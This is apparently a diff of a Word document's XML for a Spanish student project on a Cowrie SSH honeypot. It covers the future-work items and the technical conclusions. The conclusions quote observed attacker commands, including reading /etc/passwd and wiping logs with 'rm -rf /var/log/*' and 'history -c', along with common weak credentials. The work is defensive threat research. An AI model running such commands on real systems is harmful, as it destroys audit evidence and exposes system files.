           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Honeypot de alta interacción: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sustituir Cowrie por un sistema que proporcione un Linux real al atacante (mediante contenedores Docker o máquinas virtuales aisladas con snapshots automáticos), permitiendo capturar comportamientos más avanzados como escalada de privilegios, movimiento lateral, instalación de rootkits y comunicación con servidores de comando y control (C2). La configuración de Cowrie con backend proxy hacia una VM real ya lo soporta, aunque requiere un aislamiento riguroso.</w:t>
+        <w:t xml:space="preserve">Trabajos Futuros</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El proyecto sienta las bases para diversas líneas de ampliación y mejora que podrían desarrollarse como continuación de este trabajo, como proyecto de Máster o como implementación profesional en un entorno corporativo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Evolución del Honeypot</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23635,15 +23760,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Honeypot multi-protocolo: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ampliar la captura a otros servicios frecuentemente atacados: HTTP (ataques a paneles de administración, exploits de aplicaciones web), Telnet (IoT), FTP (credenciales y malware), SMB (ransomware, EternalBlue). Plataformas como T-Pot integran más de 20 honeypots diferentes en un único despliegue con Docker Compose, aunque requieren significativamente más recursos.</w:t>
+        <w:t xml:space="preserve">Honeypot de alta interacción: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sustituir Cowrie por un sistema que proporcione un Linux real al atacante (mediante contenedores Docker o máquinas virtuales aisladas con snapshots automáticos), permitiendo capturar comportamientos más avanzados como escalada de privilegios, movimiento lateral, instalación de rootkits y comunicación con servidores de comando y control (C2). La configuración de Cowrie con backend proxy hacia una VM real ya lo soporta, aunque requiere un aislamiento riguroso.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23664,33 +23789,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Red distribuida de honeypots: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">desplegar instancias de Cowrie en múltiples regiones cloud (Europa, América, Asia) para comparar los patrones de ataque por zona geográfica y detectar campañas globales coordinadas. Los datos podrían centralizarse en un único dashboard para su correlación.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Mejora del Análisis</w:t>
+        <w:t xml:space="preserve">Honeypot multi-protocolo: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ampliar la captura a otros servicios frecuentemente atacados: HTTP (ataques a paneles de administración, exploits de aplicaciones web), Telnet (IoT), FTP (credenciales y malware), SMB (ransomware, EternalBlue). Plataformas como T-Pot integran más de 20 honeypots diferentes en un único despliegue con Docker Compose, aunque requieren significativamente más recursos.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23711,15 +23818,33 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Análisis de malware: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">integrar un sandbox como Cuckoo Sandbox o el servicio cloud de ANY.RUN para analizar automáticamente los binarios descargados por los atacantes, extrayendo indicadores de compromiso (IOC) adicionales: hashes, dominios contactados, claves de registro modificadas y comportamiento en red.</w:t>
+        <w:t xml:space="preserve">Red distribuida de honeypots: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">desplegar instancias de Cowrie en múltiples regiones cloud (Europa, América, Asia) para comparar los patrones de ataque por zona geográfica y detectar campañas globales coordinadas. Los datos podrían centralizarse en un único dashboard para su correlación.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mejora del Análisis</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23740,15 +23865,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Machine learning para detección de patrones: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">aplicar algoritmos de clustering (K-Means, DBSCAN) sobre las sesiones de ataque para identificar grupos de atacantes con comportamientos similares, detectando campañas coordinadas o variantes de un mismo bot. Las características podrían incluir secuencias de comandos, intervalos temporales y credenciales probadas.</w:t>
+        <w:t xml:space="preserve">Análisis de malware: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">integrar un sandbox como Cuckoo Sandbox o el servicio cloud de ANY.RUN para analizar automáticamente los binarios descargados por los atacantes, extrayendo indicadores de compromiso (IOC) adicionales: hashes, dominios contactados, claves de registro modificadas y comportamiento en red.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23769,33 +23894,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Visualización geográfica interactiva: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">generar un mapa interactivo (Leaflet o Folium) con la distribución geográfica de los atacantes, actualizándose en tiempo real conforme se registran nuevos ataques. Incluir líneas de flujo que muestren las rutas de ataque y heatmaps de densidad por región.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Integración y Automatización</w:t>
+        <w:t xml:space="preserve">Machine learning para detección de patrones: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">aplicar algoritmos de clustering (K-Means, DBSCAN) sobre las sesiones de ataque para identificar grupos de atacantes con comportamientos similares, detectando campañas coordinadas o variantes de un mismo bot. Las características podrían incluir secuencias de comandos, intervalos temporales y credenciales probadas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23816,15 +23923,33 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Automatización con Wazuh: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">desarrollar reglas personalizadas y decodificadores en Wazuh que generen alertas en tiempo real cuando se detecten patrones de ataque específicos: más de 100 intentos de login desde la misma IP en una hora, descarga de binarios con hashes conocidos como malware, o ejecución de comandos asociados a técnicas MITRE ATT&amp;CK concretas.</w:t>
+        <w:t xml:space="preserve">Visualización geográfica interactiva: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">generar un mapa interactivo (Leaflet o Folium) con la distribución geográfica de los atacantes, actualizándose en tiempo real conforme se registran nuevos ataques. Incluir líneas de flujo que muestren las rutas de ataque y heatmaps de densidad por región.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Integración y Automatización</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23845,15 +23970,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pipeline SOAR: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">construir un flujo de respuesta automatizada (Security Orchestration, Automation and Response) que, ante la detección de un ataque significativo, genere automáticamente el ticket correspondiente, notifique al equipo de seguridad y actualice las listas de bloqueo del firewall perimetral.</w:t>
+        <w:t xml:space="preserve">Automatización con Wazuh: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">desarrollar reglas personalizadas y decodificadores en Wazuh que generen alertas en tiempo real cuando se detecten patrones de ataque específicos: más de 100 intentos de login desde la misma IP en una hora, descarga de binarios con hashes conocidos como malware, o ejecución de comandos asociados a técnicas MITRE ATT&amp;CK concretas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23874,221 +23999,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Alimentación de feeds de amenazas: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">publicar las IPs atacantes, los hashes de malware y los IOC extraídos como feed de inteligencia en formato STIX/TAXII para su consumo por otros sistemas de seguridad (firewalls, IDS/IPS, SIEMs) y por la comunidad de ciberseguridad a través de plataformas como MISP (Malware Information Sharing Platform).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:keepNext/>
-        <w:pageBreakBefore/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones Técnicas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El despliegue de un honeypot SSH con Cowrie ha permitido verificar de primera mano la magnitud y la naturaleza de los ataques automatizados que recibe cualquier servidor expuesto a Internet. Desde el momento en que el puerto 22 queda accesible, los intentos de fuerza bruta comienzan en cuestión de minutos, procedentes de IPs distribuidas por todo el mundo. Este dato, aunque conocido en la literatura, adquiere una dimensión diferente cuando se observa en primera persona sobre infraestructura propia.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El análisis de los datos capturados revela patrones consistentes con la literatura especializada y los informes de los principales CERT europeos: predominio de credenciales triviales (root/123456, admin/admin, test/test), ejecución sistemática de comandos de reconocimiento (uname -a, cat /etc/passwd, whoami, id) seguida de intentos de descarga de malware mediante wget y curl, y borrado de huellas (history -c, rm -rf /var/log/*). Este comportamiento secuencial y altamente estandarizado confirma que la inmensa mayoría de los ataques los ejecutan scripts automatizados, no operadores humanos.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">La clasificación MITRE ATT&amp;CK confirma que la actividad observada abarca múltiples tácticas: desde el Acceso Inicial (T1110 – Brute Force) hasta la Evasión de Defensas (T1070 – Indicator Removal on Host), pasando por Ejecución (T1059 – Command and Scripting Interpreter), Descubrimiento (T1082 – System Information Discovery) y Comando y Control. La mayoría de las técnicas observadas se corresponden con las fases tempranas de la cadena de ataque (kill chain), lo que es coherente con el perfil de los atacantes: bots que buscan acceso rápido para el despliegue de criptomineros, la incorporación del servidor a una botnet o el lanzamiento de ataques secundarios.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones sobre la Infraestructura</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Desde el punto de vista técnico, el proyecto demuestra que es posible montar una infraestructura de inteligencia de amenazas funcional con software exclusivamente libre y un coste de infraestructura muy reducido. Un servidor pequeño (2 vCPU y 4 GB de RAM) es más que suficiente para ejecutar Cowrie, el sistema operativo y los servicios auxiliares simultáneamente. El cambio forzoso de Oracle Cloud a Hetzner Cloud demostró además el valor de automatizar el despliegue con scripts genéricos: cambiar de proveedor solo afectó a la creación de la máquina.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">La combinación del firewall del proveedor (Cloud Firewall de Hetzner), el firewall del host (iptables) y la redirección NAT proporciona tres capas de protección para el SSH de administración real. El puerto 2022 está expuesto a Internet, pero al aceptar únicamente autenticación por clave y prohibir el acceso como root, los intentos de acceso no autorizados no tienen posibilidad de éxito. Esta arquitectura de defensa en profundidad es trasladable a cualquier entorno de producción.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El script Python desarrollado (cowrie_analyzer.py) automatiza el procesamiento de miles de eventos y genera artefactos visuales directamente utilizables en un informe de seguridad profesional. Su diseño modular permite ampliar el análisis con nuevas métricas sin modificar la estructura existente. El generador de datos de prueba (generate_sample_logs.py) ha permitido desarrollar y validar el script de análisis sin necesidad de esperar a la captura de datos reales, acelerando significativamente el desarrollo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones Formativas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Como reflexión profesional, el proyecto ha reforzado competencias transversales del ciclo de ASIR que son directamente aplicables en el mercado laboral:</w:t>
+        <w:t xml:space="preserve">Pipeline SOAR: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">construir un flujo de respuesta automatizada (Security Orchestration, Automation and Response) que, ante la detección de un ataque significativo, genere automáticamente el ticket correspondiente, notifique al equipo de seguridad y actualice las listas de bloqueo del firewall perimetral.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24109,15 +24028,221 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Administración de sistemas Linux en entornos cloud: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">despliegue de servidores, configuración de cortafuegos del proveedor, gestión de claves SSH y conexión remota en Hetzner Cloud, además del uso de la API de Oracle Cloud Infrastructure para automatizar el aprovisionamiento.</w:t>
+        <w:t xml:space="preserve">Alimentación de feeds de amenazas: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">publicar las IPs atacantes, los hashes de malware y los IOC extraídos como feed de inteligencia en formato STIX/TAXII para su consumo por otros sistemas de seguridad (firewalls, IDS/IPS, SIEMs) y por la comunidad de ciberseguridad a través de plataformas como MISP (Malware Information Sharing Platform).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:pageBreakBefore/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones Técnicas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El despliegue de un honeypot SSH con Cowrie ha permitido verificar de primera mano la magnitud y la naturaleza de los ataques automatizados que recibe cualquier servidor expuesto a Internet. Desde el momento en que el puerto 22 queda accesible, los intentos de fuerza bruta comienzan en cuestión de minutos, procedentes de IPs distribuidas por todo el mundo. Este dato, aunque conocido en la literatura, adquiere una dimensión diferente cuando se observa en primera persona sobre infraestructura propia.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El análisis de los datos capturados revela patrones consistentes con la literatura especializada y los informes de los principales CERT europeos: predominio de credenciales triviales (root/123456, admin/admin, test/test), ejecución sistemática de comandos de reconocimiento (uname -a, cat /etc/passwd, whoami, id) seguida de intentos de descarga de malware mediante wget y curl, y borrado de huellas (history -c, rm -rf /var/log/*). Este comportamiento secuencial y altamente estandarizado confirma que la inmensa mayoría de los ataques los ejecutan scripts automatizados, no operadores humanos.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La clasificación MITRE ATT&amp;CK confirma que la actividad observada abarca múltiples tácticas: desde el Acceso Inicial (T1110 – Brute Force) hasta la Evasión de Defensas (T1070 – Indicator Removal on Host), pasando por Ejecución (T1059 – Command and Scripting Interpreter), Descubrimiento (T1082 – System Information Discovery) y Comando y Control. La mayoría de las técnicas observadas se corresponden con las fases tempranas de la cadena de ataque (kill chain), lo que es coherente con el perfil de los atacantes: bots que buscan acceso rápido para el despliegue de criptomineros, la incorporación del servidor a una botnet o el lanzamiento de ataques secundarios.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
